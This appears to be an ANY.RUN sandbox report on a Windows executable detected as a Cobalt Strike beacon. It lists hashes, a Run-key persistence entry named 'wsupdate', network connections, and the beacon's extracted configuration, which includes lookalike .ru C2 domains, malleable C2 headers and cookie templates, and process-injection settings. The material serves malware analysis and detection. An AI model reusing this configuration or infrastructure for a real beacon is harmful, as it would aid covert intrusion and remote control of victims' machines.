File name:

17c330ef7cdad8cf468bb43ff5b42a06.exe

Full analysis: https://app.any.run/tasks/41e21c8b-83c3-4f93-b251-49aadbcd3f45
Verdict: Malicious activity
Threats:

Cobalt Strike is a legitimate penetration software toolkit developed by Forta. But its cracked versions are widely adopted by bad actors, who use it as a C2 system of choice for targeted attacks.

Malware Trends Tracker     >>>
Analysis date: May 25, 2025, 15:33:00
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
golang
cobaltstrike
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5:

17C330EF7CDAD8CF468BB43FF5B42A06

SHA1:

2AD255DC761A893C7CD4DA314B927C70644469D7

SHA256:

EBB245269E645416C263F5E4F3397F09E50E9ED517D9946DF38F88F72F3AE0F9

SSDEEP:

49152:dcxK8SUq4wKmVtFXpx2NgvEzCFwh08jAC000VpgZBWupaFQNOFGGqI:z4e75pwSFJdC000GxB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes the autorun value in the registry

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

    • COBALTSTRIKE has been detected (YARA)

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Checks supported languages

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

    • Reads the computer name

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

    • Reads the machine GUID from the registry

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

    • Auto-launch of the file from Registry key

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

    • Reads the software policy settings

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
      • slui.exe (PID: 2136)

    • Manual execution by a user

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)

    • Application based on Golang

      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5408)
      • 17c330ef7cdad8cf468bb43ff5b42a06.exe (PID: 5344)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

CobalStrike

(PID) Process(5408) 17c330ef7cdad8cf468bb43ff5b42a06.exe
C2 (4)roscocmos.ru/static/images/header_autumnshade12.jpg
tvoye-wear.ru/static/images/header_autumnshade12.jpg
whatsqpp.ru/svc/media/v5/collection/upload_twilight23.jpg
wldberies.ru/static/images/header_autumnshade12.jpg
BeaconTypeHTTPS
Port443
SleepTime8800
MaxGetSize2796303
Jitter40
PublicKey-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4+TIAHV7jGEGKpychAPoE4bir ljeSw7XTDy2kbgAznLsnZqHS4eQeKR1AYETfYNld4tc+LwT08Zl5ei4VRYRjWYPy eNXfvp1sdaoBcdMyrQ5Ub+Ka08huquLOCPjMTpSlRkuYD+4lVBfHC8J54FkO5Tn4 dMRzhbDiOvlTA2xGMwIDAQAB -----END PUBLIC KEY-----
DNS_strategyfailover
DNS_strategy_rotate_seconds-1
DNS_strategy_fail_x-4294967291
DNS_strategy_fail_seconds-1
SpawnTo00000000000000000000000000000000
Spawnto_x86%windir%\syswow64\rundll32.exe
Spawnto_x64%windir%\sysnative\rundll32.exe
CryptoScheme0
HttpGet_VerbGET
HttpPost_VerbPOST
HttpPostChunk0
Watermark987654321
bStageCleanupTrue
bCFGCautionFalse
UserAgentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chromium/123.0.6312.85 Safari/537.36
HttpPostUri/api/v5/auth/session/requestaccess
Malleable_C2_InstructionsRemove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, XOR mask w/ ...
HttpGet_Metadata
ConstHeaders (3)Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
SessionId (4)base64url
prepend: session_id=de47fa92-8c1b-4f7d-91b3-2c9e74a3ef55; intro_seen=false; tracking_code=trk.4.923874501.1713974932; access_key=a9d3cefa84e642b0a7d1f934c2b58eab; last_active=1713974932; display_name=
append: ;
header: Cookie
HttpPost_Metadata
ConstHeaders (7)Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
SessionId (4)base64url
prepend: access_ref=Kv57MzQaW3tH9pEbN6yX; feature_toggle=
append: ;
header: Cookie
Output (5)mask
base64url
prepend: {"command":"loadStats","settings":{"count":60,"showArchived":false},"payload":"
append: "}
print
bUsesCookies0001
Proxy_BehaviorUse IE settings
tcpFrameHeader000a6c6f6c6b656b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
smbFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
KillDate0-0-0
bProcInject_StartRWXFalse
bProcInject_UseRWXFalse
bProcInject_MinAllocSize19823
ProcInject_PrependAppend_x860f1f000f1f440000660f1f4400000f1f80000000000f1f840000000000..
ProcInject_PrependAppend_x644d0f1f840000000000480f1f800000000066900f1f4000909090909090909090..
ProcInject_Stubae5afcfee8026674dc8f3b4f2da46c7f
ProcInject_AllocationMethodNtMapViewOfSection
(PID) Process(5344) 17c330ef7cdad8cf468bb43ff5b42a06.exe
C2 (4)roscocmos.ru/static/images/header_autumnshade12.jpg
tvoye-wear.ru/static/images/header_autumnshade12.jpg
whatsqpp.ru/svc/media/v5/collection/upload_twilight23.jpg
wldberies.ru/static/images/header_autumnshade12.jpg
BeaconTypeHTTPS
Port443
SleepTime8800
MaxGetSize2796303
Jitter40
PublicKey-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4+TIAHV7jGEGKpychAPoE4bir ljeSw7XTDy2kbgAznLsnZqHS4eQeKR1AYETfYNld4tc+LwT08Zl5ei4VRYRjWYPy eNXfvp1sdaoBcdMyrQ5Ub+Ka08huquLOCPjMTpSlRkuYD+4lVBfHC8J54FkO5Tn4 dMRzhbDiOvlTA2xGMwIDAQAB -----END PUBLIC KEY-----
DNS_strategyfailover
DNS_strategy_rotate_seconds-1
DNS_strategy_fail_x-4294967291
DNS_strategy_fail_seconds-1
SpawnTo00000000000000000000000000000000
Spawnto_x86%windir%\syswow64\rundll32.exe
Spawnto_x64%windir%\sysnative\rundll32.exe
CryptoScheme0
HttpGet_VerbGET
HttpPost_VerbPOST
HttpPostChunk0
Watermark987654321
bStageCleanupTrue
bCFGCautionFalse
UserAgentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chromium/123.0.6312.85 Safari/537.36
HttpPostUri/api/v5/auth/session/requestaccess
Malleable_C2_InstructionsRemove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, XOR mask w/ ...
HttpGet_Metadata
ConstHeaders (3)Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
SessionId (4)base64url
prepend: session_id=de47fa92-8c1b-4f7d-91b3-2c9e74a3ef55; intro_seen=false; tracking_code=trk.4.923874501.1713974932; access_key=a9d3cefa84e642b0a7d1f934c2b58eab; last_active=1713974932; display_name=
append: ;
header: Cookie
HttpPost_Metadata
ConstHeaders (7)Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
SessionId (4)base64url
prepend: access_ref=Kv57MzQaW3tH9pEbN6yX; feature_toggle=
append: ;
header: Cookie
Output (5)mask
base64url
prepend: {"command":"loadStats","settings":{"count":60,"showArchived":false},"payload":"
append: "}
print
bUsesCookies0001
Proxy_BehaviorUse IE settings
tcpFrameHeader000a6c6f6c6b656b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
smbFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
KillDate0-0-0
bProcInject_StartRWXFalse
bProcInject_UseRWXFalse
bProcInject_MinAllocSize19823
ProcInject_PrependAppend_x860f1f000f1f440000660f1f4400000f1f80000000000f1f840000000000..
ProcInject_PrependAppend_x644d0f1f840000000000480f1f800000000066900f1f4000909090909090909090..
ProcInject_Stubae5afcfee8026674dc8f3b4f2da46c7f
ProcInject_AllocationMethodNtMapViewOfSection
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 3
CodeSize: 891392
InitializedDataSize: 109568
UninitializedDataSize: -
EntryPoint: 0x6f340
OSVersion: 6.1
ImageVersion: 1
SubsystemVersion: 6.1
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #COBALTSTRIKE 17c330ef7cdad8cf468bb43ff5b42a06.exe sppextcomobj.exe no specs slui.exe #COBALTSTRIKE 17c330ef7cdad8cf468bb43ff5b42a06.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2136"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4688C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5344C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exeC:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
c:\windows\system32\ws2_32.dll
CobalStrike
(PID) Process(5344) 17c330ef7cdad8cf468bb43ff5b42a06.exe
C2 (4)roscocmos.ru/static/images/header_autumnshade12.jpg
tvoye-wear.ru/static/images/header_autumnshade12.jpg
whatsqpp.ru/svc/media/v5/collection/upload_twilight23.jpg
wldberies.ru/static/images/header_autumnshade12.jpg
BeaconTypeHTTPS
Port443
SleepTime8800
MaxGetSize2796303
Jitter40
PublicKey-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4+TIAHV7jGEGKpychAPoE4bir ljeSw7XTDy2kbgAznLsnZqHS4eQeKR1AYETfYNld4tc+LwT08Zl5ei4VRYRjWYPy eNXfvp1sdaoBcdMyrQ5Ub+Ka08huquLOCPjMTpSlRkuYD+4lVBfHC8J54FkO5Tn4 dMRzhbDiOvlTA2xGMwIDAQAB -----END PUBLIC KEY-----
DNS_strategyfailover
DNS_strategy_rotate_seconds-1
DNS_strategy_fail_x-4294967291
DNS_strategy_fail_seconds-1
SpawnTo00000000000000000000000000000000
Spawnto_x86%windir%\syswow64\rundll32.exe
Spawnto_x64%windir%\sysnative\rundll32.exe
CryptoScheme0
HttpGet_VerbGET
HttpPost_VerbPOST
HttpPostChunk0
Watermark987654321
bStageCleanupTrue
bCFGCautionFalse
UserAgentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chromium/123.0.6312.85 Safari/537.36
HttpPostUri/api/v5/auth/session/requestaccess
Malleable_C2_InstructionsRemove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, XOR mask w/ ...
HttpGet_Metadata
ConstHeaders (3)Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
SessionId (4)base64url
prepend: session_id=de47fa92-8c1b-4f7d-91b3-2c9e74a3ef55; intro_seen=false; tracking_code=trk.4.923874501.1713974932; access_key=a9d3cefa84e642b0a7d1f934c2b58eab; last_active=1713974932; display_name=
append: ;
header: Cookie
HttpPost_Metadata
ConstHeaders (7)Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
SessionId (4)base64url
prepend: access_ref=Kv57MzQaW3tH9pEbN6yX; feature_toggle=
append: ;
header: Cookie
Output (5)mask
base64url
prepend: {"command":"loadStats","settings":{"count":60,"showArchived":false},"payload":"
append: "}
print
bUsesCookies0001
Proxy_BehaviorUse IE settings
tcpFrameHeader000a6c6f6c6b656b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
smbFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
KillDate0-0-0
bProcInject_StartRWXFalse
bProcInject_UseRWXFalse
bProcInject_MinAllocSize19823
ProcInject_PrependAppend_x860f1f000f1f440000660f1f4400000f1f80000000000f1f840000000000..
ProcInject_PrependAppend_x644d0f1f840000000000480f1f800000000066900f1f4000909090909090909090..
ProcInject_Stubae5afcfee8026674dc8f3b4f2da46c7f
ProcInject_AllocationMethodNtMapViewOfSection
5408"C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe" C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
CobalStrike
(PID) Process(5408) 17c330ef7cdad8cf468bb43ff5b42a06.exe
C2 (4)roscocmos.ru/static/images/header_autumnshade12.jpg
tvoye-wear.ru/static/images/header_autumnshade12.jpg
whatsqpp.ru/svc/media/v5/collection/upload_twilight23.jpg
wldberies.ru/static/images/header_autumnshade12.jpg
BeaconTypeHTTPS
Port443
SleepTime8800
MaxGetSize2796303
Jitter40
PublicKey-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC4+TIAHV7jGEGKpychAPoE4bir ljeSw7XTDy2kbgAznLsnZqHS4eQeKR1AYETfYNld4tc+LwT08Zl5ei4VRYRjWYPy eNXfvp1sdaoBcdMyrQ5Ub+Ka08huquLOCPjMTpSlRkuYD+4lVBfHC8J54FkO5Tn4 dMRzhbDiOvlTA2xGMwIDAQAB -----END PUBLIC KEY-----
DNS_strategyfailover
DNS_strategy_rotate_seconds-1
DNS_strategy_fail_x-4294967291
DNS_strategy_fail_seconds-1
SpawnTo00000000000000000000000000000000
Spawnto_x86%windir%\syswow64\rundll32.exe
Spawnto_x64%windir%\sysnative\rundll32.exe
CryptoScheme0
HttpGet_VerbGET
HttpPost_VerbPOST
HttpPostChunk0
Watermark987654321
bStageCleanupTrue
bCFGCautionFalse
UserAgentMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chromium/123.0.6312.85 Safari/537.36
HttpPostUri/api/v5/auth/session/requestaccess
Malleable_C2_InstructionsRemove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, Remove 12 bytes from the beginning, XOR mask w/ ...
HttpGet_Metadata
ConstHeaders (3)Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
SessionId (4)base64url
prepend: session_id=de47fa92-8c1b-4f7d-91b3-2c9e74a3ef55; intro_seen=false; tracking_code=trk.4.923874501.1713974932; access_key=a9d3cefa84e642b0a7d1f934c2b58eab; last_active=1713974932; display_name=
append: ;
header: Cookie
HttpPost_Metadata
ConstHeaders (7)Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
SessionId (4)base64url
prepend: access_ref=Kv57MzQaW3tH9pEbN6yX; feature_toggle=
append: ;
header: Cookie
Output (5)mask
base64url
prepend: {"command":"loadStats","settings":{"count":60,"showArchived":false},"payload":"
append: "}
print
bUsesCookies0001
Proxy_BehaviorUse IE settings
tcpFrameHeader000a6c6f6c6b656b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
smbFrameHeader0004000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
KillDate0-0-0
bProcInject_StartRWXFalse
bProcInject_UseRWXFalse
bProcInject_MinAllocSize19823
ProcInject_PrependAppend_x860f1f000f1f440000660f1f4400000f1f80000000000f1f840000000000..
ProcInject_PrependAppend_x644d0f1f840000000000480f1f800000000066900f1f4000909090909090909090..
ProcInject_Stubae5afcfee8026674dc8f3b4f2da46c7f
ProcInject_AllocationMethodNtMapViewOfSection
6620C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
Total events
3 454
Read events
3 452
Write events
2
Delete events
0

Modification events

(PID) Process:(5408) 17c330ef7cdad8cf468bb43ff5b42a06.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:wsupdate
Value:
C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
(PID) Process:(5344) 17c330ef7cdad8cf468bb43ff5b42a06.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:wsupdate
Value:
C:\Users\admin\AppData\Local\Temp\17c330ef7cdad8cf468bb43ff5b42a06.exe
Executable files
0
Suspicious files
0
Text files
0
Unknown types
0

Dropped files

No data
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
23
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1228
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
1228
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
2.16.168.114:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
2104
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5408
17c330ef7cdad8cf468bb43ff5b42a06.exe
31.177.111.46:443
roscocmos.ru
RU
unknown
2112
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5344
17c330ef7cdad8cf468bb43ff5b42a06.exe
31.177.111.46:443
roscocmos.ru
RU
unknown

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.206
whitelisted
roscocmos.ru
  • 31.177.111.46
unknown
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.31.3
  • 40.126.31.69
  • 20.190.159.130
  • 40.126.31.2
  • 40.126.31.128
  • 40.126.31.71
  • 20.190.159.4
  • 20.190.159.71
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
17c330ef7cdad8cf468bb43ff5b42a06.exe